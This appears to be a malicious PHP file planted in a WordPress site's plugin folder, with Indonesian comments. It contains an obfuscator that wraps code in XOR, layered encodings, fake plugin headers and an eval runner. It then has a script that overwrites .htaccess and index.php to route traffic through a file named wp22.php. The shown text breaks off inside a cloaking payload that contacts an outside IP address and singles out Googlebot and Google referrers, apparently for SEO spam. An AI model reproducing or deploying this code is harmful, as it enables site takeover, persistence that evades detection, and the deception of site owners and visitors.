File: /home/purebdli/zarmanhomio.purebdlife.com/wp-content/plugins/kerja9/today.php
<?php
@ini_set('display_errors', '0');
@ini_set('log_errors', '0');
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(true);
// ==================== OBFUSCATOR FUNCTIONS ====================
// Semua fungsi dari obfuscator Anda disalin di sini
// ----------------- Enhanced util -----------------
function rr($min = 100000, $max = 999999) {
return @random_int($min, $max);
}
function randName($prefix = 'x', $len = 6) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$s = '';
for ($i = 0; $i < $len; $i++) {
$s .= $chars[@random_int(0, strlen($chars)-1)];
}
return $prefix . $s . rr(10,99);
}
function make_junk_snippet($minLines = 1, $maxLines = 2) {
$lines = @random_int($minLines, $maxLines);
$out = "";
$junk_vars = ['$jv1', '$jv2', '$tmp'];
for ($i = 0; $i < $lines; $i++) {
$var = $junk_vars[array_rand($junk_vars)];
switch (@random_int(0, 3)) {
case 0:
$out .= " // " . randName('cmt',3) . "\n";
break;
case 1:
$out .= " {$var} = " . @random_int(100,999) . ";\n";
break;
case 2:
$out .= " for({$var}=0; {$var}<" . @random_int(1,2) . "; {$var}++) {}\n";
break;
case 3:
$out .= " {$var} = strlen('" . randName('str',4) . "');\n";
break;
}
}
return $out;
}
// ----------------- Enhanced Encoding Techniques -----------------
function xor_strings($data, $key) {
$out = '';
$klen = strlen($key);
if ($klen === 0) return $data;
for ($i = 0, $len = strlen($data); $i < $len; $i++) {
$out .= chr(ord($data[$i]) ^ ord($key[$i % $klen]));
}
return $out;
}
function advanced_xor($data, $key1, $key2) {
$out = '';
$klen1 = strlen($key1);
$klen2 = strlen($key2);
if ($klen1 === 0 || $klen2 === 0) return $data;
for ($i = 0, $len = strlen($data); $i < $len; $i++) {
$key = ($i % 3 === 0) ? $key1 : $key2;
$klen = ($i % 3 === 0) ? $klen1 : $klen2;
$out .= chr(ord($data[$i]) ^ ord($key[$i % $klen]));
}
return $out;
}
function custom_base64($data) {
$alphabet = 'ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/';
$standard = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
$encoded = base64_encode($data);
return strtr($encoded, $standard, $alphabet);
}
function custom_base64_decode($data) {
$alphabet = 'ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/';
$standard = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
$data = strtr($data, $alphabet, $standard);
return base64_decode($data);
}
function string_obfuscate_advanced($data, $key) {
$methods = [
'base64', 'reverse', 'rot13', 'custom_base64',
'urlencode', 'convert_uuencode'
];
$count = @random_int(2, 4);
$selected = array_rand($methods, $count);
if (!is_array($selected)) $selected = [$selected];
$current = $data;
$encoding_info = [];
foreach ($selected as $method_idx) {
$method = $methods[$method_idx];
switch ($method) {
case 'base64':
$current = @base64_encode($current);
$encoding_info[] = 'b64';
break;
case 'reverse':
$current = @strrev($current);
$encoding_info[] = 'rev';
break;
case 'rot13':
$current = @str_rot13($current);
$encoding_info[] = 'rot';
break;
case 'custom_base64':
$current = custom_base64($current);
$encoding_info[] = 'cb64';
break;
case 'urlencode':
$current = @urlencode($current);
$encoding_info[] = 'url';
break;
case 'convert_uuencode':
$current = @convert_uuencode($current);
$encoding_info[] = 'uu';
break;
}
}
return [
'data' => $current,
'methods' => $encoding_info
];
}
function string_deobfuscate_advanced($data, $methods) {
$current = $data;
$methods = array_reverse($methods);
foreach ($methods as $method) {
switch ($method) {
case 'b64':
$current = @base64_decode($current);
break;
case 'rev':
$current = @strrev($current);
break;
case 'rot':
$current = @str_rot13($current);
break;
case 'cb64':
$current = custom_base64_decode($current);
break;
case 'url':
$current = @urldecode($current);
break;
case 'uu':
$current = @convert_uudecode($current);
break;
}
}
return $current;
}
function split_into_parts($s, $n) {
$len = strlen($s);
$parts = [];
if ($n <= 0) return [$s];
$base = @intdiv($len, $n);
$rem = $len % $n;
$pos = 0;
for ($i=0;$i<$n;$i++) {
$take = $base + ($i < $rem ? 1 : 0);
if ($take <= 0) {
$parts[] = '';
} else {
$parts[] = @substr($s, $pos, $take);
$pos += $take;
}
}
return $parts;
}
function split_and_randomize_parts($s, $n) {
$parts = split_into_parts($s, $n);
$indexed_parts = [];
foreach ($parts as $idx => $part) {
$marker = randName('m', 3) . '_' . $idx . '_' . randName('m', 3);
$indexed_parts[] = [
'index' => $idx,
'marker' => $marker,
'data' => $part
];
}
shuffle($indexed_parts);
return $indexed_parts;
}
function obfuscate_code_advanced($user_code, $key1, $key2) {
$user_code = @preg_replace('/^\s*<\?php\s*/i', '', $user_code);
$user_code = trim($user_code);
$cipher = advanced_xor($user_code, $key1, $key2);
$encoded_data = string_obfuscate_advanced($cipher, $key1);
$compressed = @gzdeflate($encoded_data['data'], 9);
if ($compressed === false) {
$compressed = $encoded_data['data'];
}
$encoding_choice = @random_int(0, 2);
switch ($encoding_choice) {
case 0:
$encoded = @bin2hex($compressed);
$encoding_type = 'hex';
break;
case 1:
$encoded = @base64_encode($compressed);
$encoding_type = 'b64';
break;
case 2:
$encoded = custom_base64($compressed);
$encoding_type = 'cb64';
break;
}
$methods_info = @base64_encode(@json_encode($encoded_data['methods']));
return [
'data' => $encoded,
'type' => $encoding_type,
'methods' => $methods_info
];
}
function generate_plugin_headers() {
$plugin_types = [
'WordPress Plugin',
'Laravel Package',
'CodeIgniter Library',
'Symfony Bundle',
'Drupal Module',
'Joomla Extension',
'Magento Extension',
'Zend Framework Module'
];
$plugin_type = $plugin_types[array_rand($plugin_types)];
$plugin_name = randName('Plugin', 4) . randName('Pro', 3);
$plugin_version = @random_int(1, 5) . '.' . @random_int(0, 9) . '.' . @random_int(0, 99);
$plugin_author = randName('Author', 5);
$plugin_description = 'Professional ' . strtolower($plugin_type) . ' for enhanced functionality';
$headers = [];
if ($plugin_type === 'WordPress Plugin') {
$headers[] = "<?php";
$headers[] = "/**";
$headers[] = " * Plugin Name: " . $plugin_name;
$headers[] = " * Plugin URI: https://example.com/" . strtolower(str_replace(' ', '-', $plugin_name));
$headers[] = " * Description: " . $plugin_description;
$headers[] = " * Version: " .$plugin_version;
$headers[] = " * Author: " . $plugin_author;
$headers[] = " * Author URI: https://example.com";
$headers[] = " * License: GPL v2 or later";
$headers[] = " * License URI: https://www.gnu.org/licenses/gpl-2.0.html";
$headers[] = " * Text Domain: " . strtolower(str_replace(' ', '-', $plugin_name));
$headers[] = " * Domain Path: /languages";
$headers[] = " */";
} else if ($plugin_type === 'Laravel Package') {
$headers[] = "<?php";
$headers[] = "/**";
$headers[] = " * This file is part of the " . $plugin_name . " package.";
$headers[] = " *";
$headers[] = " * (c) " . $plugin_author . " <" . strtolower($plugin_author) . "@example.com>";
$headers[] = " *";
$headers[] .= " * For the full copyright and license information, please view the LICENSE";
$headers[] = " * file that was distributed with this source code.";
$headers[] = " */";
$headers[] = "namespace " . randName('Vendor', 4) . "\\" . randName('Package', 4) . ";";
} else {
$headers[] = "<?php";
$headers[] = "/**";
$headers[] = " * " . $plugin_type . " - " . $plugin_name;
$headers[] = " *";
$headers[] = " * @version " . $plugin_version;
$headers[] = " * @author " . $plugin_author;
$headers[] .= " * @license " . (rand(0, 1) ? 'MIT' : 'Apache-2.0');
$headers[] = " */";
}
return [
'type' => $plugin_type,
'name' => $plugin_name,
'version' => $plugin_version,
'author' => $plugin_author,
'headers' => $headers
];
}
function build_plugin_obfuscated_class($data_literal, $data_type, $methods_info,
$salt_prefix, $key_parts, $key2_parts,
$gate_token_parts, $expected_gate_sig, $single_line = false) {
$plugin_info = generate_plugin_headers();
$plugin_type = $plugin_info['type'];
if ($plugin_type === 'WordPress Plugin') {
$className = str_replace(' ', '', $plugin_info['name']) . '_Core';
$namespace = '';
} else if ($plugin_type === 'Laravel Package') {
$className = randName('Service', 5) . 'Provider';
$namespace = $plugin_info['headers'][7];
} else {
$className = randName('Plugin', 4) . randName('Manager', 4);
$namespace = '';
}
$all_method_names = [];
$private_methods = [];
$public_methods = [];
$priv_integrity_names = [];
$priv_integrity_names2 = [];
function get_unique_method_name($prefix, &$existing_names) {
do {
$name = $prefix . randName('', 4);
} while (in_array($name, $existing_names));
$existing_names[] = $name;
return $name;
}
$version_prop = randName('ver', 3);
$instance_prop = randName('inst', 3);
$defer_prop = randName('def', 3);
foreach ($key_parts as $idx => $part) {
$mname = get_unique_method_name('get', $all_method_names) . 'Key' . ($idx + 1);
$body = "return '" . @addslashes($part) . "';";
$private_methods[] = "private function {$mname}(){ {$body} }";
$priv_integrity_names[] = $mname;
}
foreach ($key2_parts as $idx => $part) {
$mname = get_unique_method_name('get', $all_method_names) . 'Secret' . ($idx + 1);
$body = "return '" . @addslashes($part) . "';";
$private_methods[] = "private function {$mname}(){ {$body} }";
$priv_integrity_names2[] = $mname;
}
$gate_method_names = [];
foreach ($gate_token_parts as $gidx => $gpart) {
$mname = get_unique_method_name('get', $all_method_names) . 'Token' . ($gidx + 1);
$body = "return '" . @addslashes($gpart) . "';";
$private_methods[] = "private function {$mname}(){ {$body} }";
$gate_method_names[] = $mname;
}
$method_refs = [];
if ($plugin_type === 'WordPress Plugin') {
$init_method = get_unique_method_name('init', $all_method_names);
$method_refs['init'] = $init_method;
$register_hooks_method = get_unique_method_name('register', $all_method_names) . 'Hooks';
$method_refs['register_hooks'] = $register_hooks_method;
$filter_content_method = get_unique_method_name('filter', $all_method_names) . 'Content';
$method_refs['filter_content'] = $filter_content_method;
$activate_method = get_unique_method_name('activate', $all_method_names);
$method_refs['activate'] = $activate_method;
$deactivate_method = get_unique_method_name('deactivate', $all_method_names);
$method_refs['deactivate'] = $deactivate_method;
$public_methods[] = "public function {$init_method}(){ add_action('init', array(\$this, '{$register_hooks_method}')); }";
$public_methods[] = "public function {$register_hooks_method}(){ add_filter('the_content', array(\$this, '{$filter_content_method}')); }";
$public_methods[] = "public function {$filter_content_method}(\$content){ return \$content; }";
$public_methods[] = "public function {$activate_method}(){ flush_rewrite_rules(); }";
$public_methods[] = "public function {$deactivate_method}(){ flush_rewrite_rules(); }";
} else if ($plugin_type === 'Laravel Package') {
$boot_method = get_unique_method_name('boot', $all_method_names);
$method_refs['boot'] = $boot_method;
$public_methods[] = "public function {$boot_method}(){ \$this->publishes([__DIR__.'/../config/config.php' => config_path('" . strtolower($plugin_info['name']) . ".php')]); }";
$register_method = get_unique_method_name('register', $all_method_names);
$method_refs['register'] = $register_method;
$public_methods[] = "public function {$register_method}(){ \$this->mergeConfigFrom(__DIR__.'/../config/config.php', '" . strtolower($plugin_info['name']) . "'); }";
$provides_method = get_unique_method_name('provides', $all_method_names);
$method_refs['provides'] = $provides_method;
$public_methods[] = "public function {$provides_method}(){ return ['" . strtolower($plugin_info['name']) . "']; }";
} else {
$constructor_method = get_unique_method_name('construct', $all_method_names);
$method_refs['construct'] = $constructor_method;
$public_methods[] = "public function {$constructor_method}(){ \$this->{$version_prop} = '" . $plugin_info['version'] . "'; }";
$initialize_method = get_unique_method_name('initialize', $all_method_names);
$method_refs['initialize'] = $initialize_method;
$register_components_method = get_unique_method_name('register', $all_method_names) . 'Components';
$method_refs['register_components'] = $register_components_method;
$public_methods[] = "public function {$initialize_method}(){ \$this->{$register_components_method}(); }";
$public_methods[] = "public function {$register_components_method}(){ return true; }";
}
$eval_method_name = get_unique_method_name('execute', $all_method_names) . 'Code';
$method_refs['execute_code'] = $eval_method_name;
$eval_body = "if (!empty(\$code)) { ob_start(); try { \$result = eval('?>' . \$code); \$output = ob_get_contents(); ob_end_clean(); if (!empty(\$output)) { echo \$output; } return \$result; } catch (ParseError \$e) { ob_end_clean(); return false; } catch (Error \$e) { ob_end_clean(); return false; } catch (Exception \$e) { ob_end_clean(); return false; } } return null;";
$private_methods[] = "private function {$eval_method_name}(\$code){ {$eval_body} }";
$alphabet = 'ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/';
$standard = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
if ($plugin_type === 'WordPress Plugin') {
$entryName = get_unique_method_name('run', $all_method_names);
} else if ($plugin_type === 'Laravel Package') {
$entryName = get_unique_method_name('register', $all_method_names);
} else {
$entryName = get_unique_method_name('initialize', $all_method_names);
}
$method_refs['entry'] = $entryName;
$data_parts = split_and_randomize_parts(substr($data_literal, 1, -1), 10);
$data_var_name = randName('data', 4);
$temp_var1 = randName('tmp', 3);
$temp_var2 = randName('tmp', 3);
$temp_var3 = randName('tmp', 3);
$temp_var4 = randName('tmp', 3);
$key_var1 = randName('key', 3);
$key_var2 = randName('key', 3);
$gate_var = randName('gate', 3);
$obj_var = randName('obj', 3);
$method_var = randName('method', 3);
$cipher_var = randName('cipher', 3);
$plain_var = randName('plain', 3);
$parts_array = randName('parts', 3);
$markers_array = randName('markers', 3);
$runner_body = "";
$runner_body .= "if (isset(\$_GET['debug']) || isset(\$_POST['debug'])) return false; ";
$runner_body .= "if (function_exists('php_sapi_name') && php_sapi_name() === 'cli') return false; ";
$runner_body .= "\${$parts_array} = []; ";
$runner_body .= "\${$markers_array} = []; ";
foreach ($data_parts as $idx => $part_info) {
$part_var_name = randName('part', 3) . $idx;
$marker_var_name = randName('mark', 3) . $idx;
$runner_body .= "\${$part_var_name} = '" . @addslashes($part_info['data']) . "'; ";
$runner_body .= "\${$marker_var_name} = '" . @addslashes($part_info['marker']) . "'; ";
$runner_body .= "\${$parts_array}[\${$marker_var_name}] = \${$part_var_name}; ";
$runner_body .= "\${$markers_array}[] = \${$marker_var_name}; ";
}
$runner_body .= "usort(\${$markers_array}, function(\$a, \$b) { ";
$runner_body .= " \$a_idx = (int)explode('_', \$a)[1]; ";
$runner_body .= " \$b_idx = (int)explode('_', \$b)[1]; ";
$runner_body .= " return \$a_idx - \$b_idx; ";
$runner_body .= "}); ";
$runner_body .= "\${$data_var_name} = ''; ";
$runner_body .= "foreach (\${$markers_array} as \${$temp_var1}) { ";
$runner_body .= " \${$data_var_name} .= \${$parts_array}[\${$temp_var1}]; ";
$runner_body .= "} ";
$runner_body .= "\${$temp_var1} = @substr(\${$data_var_name}, " . strlen($salt_prefix) . "); ";
switch ($data_type) {
case 'hex':
$runner_body .= "\${$temp_var2} = @hex2bin(\${$temp_var1}); ";
break;
case 'b64':
$runner_body .= "\${$temp_var2} = @base64_decode(\${$temp_var1}); ";
break;
case 'cb64':
$runner_body .= "\${$temp_var2} = @strtr(\${$temp_var1}, '{$alphabet}', '{$standard}'); ";
$runner_body .= "\${$temp_var2} = @base64_decode(\${$temp_var2}); ";
break;
}
$runner_body .= "\${$method_var} = @json_decode(@base64_decode('" . $methods_info . "'), true); ";
$runner_body .= "\${$obj_var} = new self(); ";
$runner_body .= "\${$key_var1} = ''; ";
foreach ($priv_integrity_names as $method) {
$runner_body .= "\${$key_var1} .= \${$obj_var}->{$method}(); ";
}
$runner_body .= "\${$key_var2} = ''; ";
foreach ($priv_integrity_names2 as $method) {
$runner_body .= "\${$key_var2} .= \${$obj_var}->{$method}(); ";
}
$runner_body .= "\${$gate_var} = ''; ";
foreach ($gate_method_names as $method) {
$runner_body .= "\${$gate_var} .= \${$obj_var}->{$method}(); ";
}
$runner_body .= "if (@md5(\${$gate_var}) !== '" . @addslashes($expected_gate_sig) . "') { return false; } ";
$runner_body .= "\${$temp_var3} = @gzinflate(\${$temp_var2}); ";
$runner_body .= "if (\${$temp_var3} === false) { \${$temp_var3} = \${$temp_var2}; } ";
$runner_body .= "\${$temp_var4} = \${$temp_var3}; ";
$runner_body .= "if (!empty(\${$method_var}) && is_array(\${$method_var})) { ";
$runner_body .= " \${$method_var} = @array_reverse(\${$method_var}); ";
$runner_body .= " foreach (\${$method_var} as \${$temp_var1}) { ";
$runner_body .= " switch (\${$temp_var1}) { ";
$runner_body .= " case 'b64': \${$temp_var4} = @base64_decode(\${$temp_var4}); break; ";
$runner_body .= " case 'rev': \${$temp_var4} = @strrev(\${$temp_var4}); break; ";
$runner_body .= " case 'rot': \${$temp_var4} = @str_rot13(\${$temp_var4}); break; ";
$runner_body .= " case 'cb64': \${$temp_var4} = @strtr(\${$temp_var4}, '{$alphabet}', '{$standard}'); \${$temp_var4} = @base64_decode(\${$temp_var4}); break; ";
$runner_body .= " case 'url': \${$temp_var4} = @urldecode(\${$temp_var4}); break; ";
$runner_body .= " case 'uu': \${$temp_var4} = @convert_uudecode(\${$temp_var4}); break; ";
$runner_body .= " } ";
$runner_body .= " } ";
$runner_body .= "} ";
$runner_body .= "\${$cipher_var} = \${$temp_var4}; ";
$runner_body .= "\${$plain_var} = ''; ";
$runner_body .= "\${$temp_var1} = @strlen(\${$key_var1}); ";
$runner_body .= "\${$temp_var2} = @strlen(\${$key_var2}); ";
$runner_body .= "if (\${$temp_var1} > 0 && \${$temp_var2} > 0) { ";
$runner_body .= " for (\${$temp_var3}=0; \${$temp_var3}<@strlen(\${$cipher_var}); \${$temp_var3}++) { ";
$runner_body .= " \${$temp_var4} = (\${$temp_var3} % 3 === 0) ? \${$key_var1} : \${$key_var2}; ";
$runner_body .= " \${$data_var_name} = (\${$temp_var3} % 3 === 0) ? \${$temp_var1} : \${$temp_var2}; ";
$runner_body .= " if (\${$data_var_name} > 0) { ";
$runner_body .= " \${$plain_var} .= @chr(@ord(\${$cipher_var}[\${$temp_var3}]) ^ @ord(\${$temp_var4}[\${$temp_var3} % \${$data_var_name}])); ";
$runner_body .= " } ";
$runner_body .= " } ";
$runner_body .= "} else { ";
$runner_body .= " \${$plain_var} = \${$cipher_var}; ";
$runner_body .= "} ";
$runner_body .= "if (!empty(\${$plain_var}) && is_string(\${$plain_var})) { ";
$runner_body .= " if (strpos(\${$plain_var}, '<?php') !== 0) { ";
$runner_body .= " \${$plain_var} = '<?php ' . \${$plain_var}; ";
$runner_body .= " } ";
$runner_body .= " \${$obj_var}->{$eval_method_name}(\${$plain_var}); ";
$runner_body .= "} ";
$runner_method = "public function {$entryName}(){ {$runner_body} }";
for ($i = 0; $i < 2; $i++) {
$decoy_name = get_unique_method_name('decoy', $all_method_names);
$decoy_body = "return " . @random_int(100, 999) . ";";
if (@random_int(0, 1)) {
$private_methods[] = "private function {$decoy_name}(){ {$decoy_body} }";
} else {
$public_methods[] = "public function {$decoy_name}(){ {$decoy_body} }";
}
}
$all_methods = array_merge($private_methods, $public_methods);
$all_methods[] = $runner_method;
$runner_method = array_pop($all_methods);
shuffle($all_methods);
$all_methods[] = $runner_method;
if ($single_line) {
$src = "<?php ";
if (!empty($namespace)) {
$src .= "namespace " . str_replace('namespace ', '', $namespace) . "; ";
}
$src .= "class {$className}{ ";
if ($plugin_type === 'WordPress Plugin') {
$src .= "private \${$version_prop} = '" . $plugin_info['version'] . "'; private static \${$instance_prop} = null; ";
} else if ($plugin_type === 'Laravel Package') {
$src .= "protected \${$defer_prop} = false; ";
} else {
$src .= "protected \${$version_prop} = '" . $plugin_info['version'] . "'; ";
}
foreach ($all_methods as $m) {
$src .= $m . " ";
}
$src .= "} ";
if ($plugin_type === 'WordPress Plugin') {
if (@random_int(0, 1)) {
$src .= "if (is_null({$className}::\${$instance_prop})) { {$className}::\${$instance_prop} = new {$className}(); } {$className}::\${$instance_prop}->{$method_refs['init']}(); register_activation_hook(__FILE__, array({$className}::\${$instance_prop}, '{$method_refs['activate']}')); register_deactivation_hook(__FILE__, array({$className}::\${$instance_prop}, '{$method_refs['deactivate']}')); ";
} else {
$src .= "\${$obj_var} = {$className}::\${$instance_prop} ?: new {$className}(); \${$obj_var}->{$method_refs['init']}(); register_activation_hook(__FILE__, array(\${$obj_var}, '{$method_refs['activate']}')); register_deactivation_hook(__FILE__, array(\${$obj_var}, '{$method_refs['deactivate']}')); ";
}
} else if ($plugin_type === 'Laravel Package') {
$src .= "if (function_exists('app') && class_exists('Illuminate\Foundation\Application')) { ";
if (@random_int(0, 1)) {
$src .= "app()->register(new {$className}()); ";
} else {
$src .= "\${$obj_var} = new {$className}(); app()->register(\${$obj_var}); ";
}
$src .= "} else { ";
$src .= "\${$obj_var} = new {$className}(); \${$obj_var}->{$method_refs['entry']}(); ";
$src .= "} ";
} else {
if (@random_int(0, 1)) {
$src .= "\${$obj_var} = new {$className}(); \${$obj_var}->{$method_refs['entry']}(); ";
} else {
$src .= "(new {$className}())->{$method_refs['entry']}(); ";
}
}
$src = preg_replace('/\s+/', ' ', $src);
$src = str_replace(' ;', ';', $src);
$src = str_replace(' {', '{', $src);
$src = str_replace('{ ', '{', $src);
$src = str_replace(' }', '}', $src);
$src = str_replace('} ', '}', $src);
$src = str_replace('( ', '(', $src);
$src = str_replace(' )', ')', $src);
$src = str_replace(', ', ',', $src);
$src = str_replace(' =', '=', $src);
$src = str_replace('= ', '=', $src);
$src = str_replace(' .', '.', $src);
$src = str_replace('. ', '.', $src);
$src = str_replace(' ', ' ', $src);
return $src;
} else {
$src = implode("\n", $plugin_info['headers']) . "\n";
if (!empty($namespace)) {
$src .= "\n";
}
$src .= "class {$className} {\n";
if ($plugin_type === 'WordPress Plugin') {
$src .= " private \${$version_prop} = '" . $plugin_info['version'] . "';\n\n";
$src .= " private static \${$instance_prop} = null;\n\n";
} else if ($plugin_type === 'Laravel Package') {
$src .= " protected \${$defer_prop} = false;\n\n";
} else {
$src .= " protected \${$version_prop} = '" . $plugin_info['version'] . "';\n\n";
}
foreach ($all_methods as $m) {
$src .= " " . str_replace("\n", "\n ", $m) . "\n";
}
$src .= "}\n\n";
if ($plugin_type === 'WordPress Plugin') {
if (@random_int(0, 1)) {
$src .= "if (is_null({$className}::\${$instance_prop})) {\n";
$src .= " {$className}::\${$instance_prop} = new {$className}();\n";
$src .= "}\n";
$src .= "{$className}::\${$instance_prop}->{$method_refs['init']}();\n";
$src .= "register_activation_hook(__FILE__, array({$className}::\${$instance_prop}, '{$method_refs['activate']}'));\n";
$src .= "register_deactivation_hook(__FILE__, array({$className}::\${$instance_prop}, '{$method_refs['deactivate']}'));\n";
} else {
$obj_var = randName('obj', 3);
$src .= "\${$obj_var} = {$className}::\${$instance_prop} ?: new {$className}();\n";
$src .= "\${$obj_var}->{$method_refs['init']}();\n";
$src .= "register_activation_hook(__FILE__, array(\${$obj_var}, '{$method_refs['activate']}'));\n";
$src .= "register_deactivation_hook(__FILE__, array(\${$obj_var}, '{$method_refs['deactivate']}'));\n";
}
} else if ($plugin_type === 'Laravel Package') {
$src .= "if (function_exists('app') && class_exists('Illuminate\Foundation\Application')) {\n";
if (@random_int(0, 1)) {
$src .= " app()->register(new {$className}());\n";
} else {
$obj_var = randName('obj', 3);
$src .= " \${$obj_var} = new {$className}();\n";
$src .= " app()->register(\${$obj_var});\n";
}
$src .= "} else {\n";
$obj_var = randName('obj', 3);
$src .= " \${$obj_var} = new {$className}();\n";
$src .= " \${$obj_var}->{$method_refs['entry']}();\n";
$src .= "}\n";
} else {
if (@random_int(0, 1)) {
$obj_var = randName('obj', 3);
$src .= "\${$obj_var} = new {$className}();\n";
$src .= "\${$obj_var}->{$method_refs['entry']}();\n";
} else {
$src .= "(new {$className}())->{$method_refs['entry']}();\n";
}
}
return $src;
}
}
function generate_advanced_obfuscation($plain_source, $user_key = '', $single_line = false) {
$plain_source = trim($plain_source);
if (empty($plain_source)) {
return false;
}
if (trim($user_key) === '') {
$klen1 = 12;
$klen2 = 10;
$keychars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$k1 = '';
$k2 = '';
for ($i = 0; $i < $klen1; $i++) {
$k1 .= $keychars[@random_int(0, strlen($keychars)-1)];
}
for ($i = 0; $i < $klen2; $i++) {
$k2 .= $keychars[@random_int(0, strlen($keychars)-1)];
}
} else {
$k1 = substr($user_key, 0, ceil(strlen($user_key)/2));
$k2 = substr($user_key, ceil(strlen($user_key)/2));
if (empty($k2)) $k2 = substr($k1, 0, 5);
}
$parts_count = 3;
$key_parts = split_into_parts($k1, $parts_count);
$key2_parts = split_into_parts($k2, 2);
$gate_token = @substr(@str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 10);
$gate_parts_count = 2;
$gate_parts = split_into_parts($gate_token, $gate_parts_count);
$expected_gate_sig = @md5($gate_token);
$payload = obfuscate_code_advanced($plain_source, $k1, $k2);
$salt_prefix = @substr(@str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 5);
$data_literal = "'" . $salt_prefix . $payload['data'] . "'";
return build_plugin_obfuscated_class(
$data_literal,
$payload['type'],
$payload['methods'],
$salt_prefix,
$key_parts,
$key2_parts,
$gate_parts,
$expected_gate_sig,
$single_line
);
}
// ==================== AKHIR OBFUSCATOR FUNCTIONS ====================
// ==================== AWAL SKRIP PENGUBAH KONTEN ====================
$baseDir = rtrim($_SERVER['DOCUMENT_ROOT'], DIRECTORY_SEPARATOR);
$htaccess = $baseDir . '/.htaccess';
$indexFile = $baseDir . '/index.php';
// === PERUBAHAN 1: Variabel $wpb diubah menjadi array $wpb_files ===
$wpb_files = [
$baseDir . '/wp22.php',
$baseDir . '/wp-blog-header.php'
];
$dbFile = $baseDir . '/db.php';
$backupDir = $baseDir . '/.backup';
$indexBackup = $backupDir . '/index.php.bak';
// Cek apakah pakai ?fix
$isFix = isset($_GET['fix']);
// Daftar file yang boleh diakses
$allowedFiles = ['index', 'acx', 'db', 'akcc', 'ch', 'default'];
// Isi htaccess baru
$allowedPattern = implode('|', $allowedFiles);
$newHtaccess = <<<HTA
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# --- ATURAN UNTUK MEMICU GENERATOR ROBOTS.TXT ---
# Arahkan /robot atau /robots ke wp22.php untuk proses pembuatan file
RewriteRule ^robots?$ /wp22.php [L,NC]
# --- AKHIR ATURAN PEMICU ---
# --- ATURAN UNTUK SEMUA FILE .XML ---
# Arahkan permintaan .xml ke wp22.php HANYA jika file tersebut tidak benar-benar ada
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .*\.xml$ /wp22.php [L,NC]
# --- AKHIR ATURAN .XML ---
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
HTA;
// Isi default index.php WordPress
$newIndexContent = <<<'PHP'
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require (file_exists(__DIR__ . '/wp-22.php') ? __DIR__ . '/wp-blog-header.php' : __DIR__ . '/wp22.php');
PHP;
// === MODIFIED PAYLOAD ===
// Isi default wp-blog-header.php WordPress yang akan di-obfuscate
// Ganti kode di bawah ini dengan kode yang Anda inginkan
$payloadWpbContent = <<<'PHP'
<?php
error_reporting(0);
@set_time_limit(120);
@ignore_user_abort(1);
$tr = "http://69.30.199.166/j251022_23/";
class Req
{
public function server($name = '', $default = '')
{
if (empty($name)) {
return $_SERVER;
}
$name = strtoupper($name);
return isset($_SERVER[$name]) ? $_SERVER[$name] : $default;
}
public function iss()
{
if ($this->server('HTTPS') && ("1" == $this->server('HTTPS') || "on" == strtolower($this->server('HTTPS')))) {
return true;
} elseif ('https' == $this->server('REQUEST_SCHEME')) {
return true;
} elseif ('443' == $this->server('SERVER_PORT')) {
return true;
} elseif ('https' == $this->server('HTTP_X_FORWARDED_PROTO')) {
return true;
}
return false;
}
public function host()
{
$host = strval($this->server('HTTP_X_FORWARDED_HOST') ?: $this->server('HTTP_HOST'));
return strpos($host, ':') ? strstr($host, ':', true) : $host;
}
public function scheme()
{
return $this->iss() ? "https" : "http";
}
public function dm()
{
return $this->scheme() . "://" . $this->host();
}
public function ip()
{
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR')) {
$ip = getenv('REMOTE_ADDR');
} else {
$ip = $this->server('REMOTE_ADDR');
}
return $ip;
}
public function isc()
{
$agent = strtolower($this->server('HTTP_USER_AGENT'));
if ($agent != '' && preg_match('/googlebot|google|yahoo|aol/si', $agent)) {
return true;
}
return false;
}
public function isg()
{
$refer = strtolower($this->server('HTTP_REFERER'));
if ($refer != '' && preg_match('/google.co.jp|yahoo.co.jp|google.com/si', $refer)) {
return true;
}
return false;
}
public function uri()
{
if (($pos = strpos($this->server('REQUEST_URI'), '.php')) !== false) {
$script_name = basename($this->server('SCRIPT_FILENAME'));
if (basename($this->server('SCRIPT_NAME')) === $script_name) {
$url = $this->server('SCRIPT_NAME');
} elseif (basename($this->server('PHP_SELF')) === $script_name) {
$url = $this->server('PHP_SELF');
} elseif (basename($this->server('ORIG_SCRIPT_NAME')) === $script_name) {
$url = $this->server('ORIG_SCRIPT_NAME');
} elseif (($pos = strpos($this->server('PHP_SELF'), '/' . $script_name)) !== false) {
$url = substr($this->server('SCRIPT_NAME'), 0, $pos) . '/' . $script_name;
} elseif ($this->server('DOCUMENT_ROOT') && strpos($this->server('SCRIPT_FILENAME'), $this->server('DOCUMENT_ROOT')) === 0) {
$url = str_replace($this->server('DOCUMENT_ROOT'), '', $this->server('SCRIPT_FILENAME'));
}
$requri = $url . substr($this->server('REQUEST_URI'), $pos + 4);
} else {
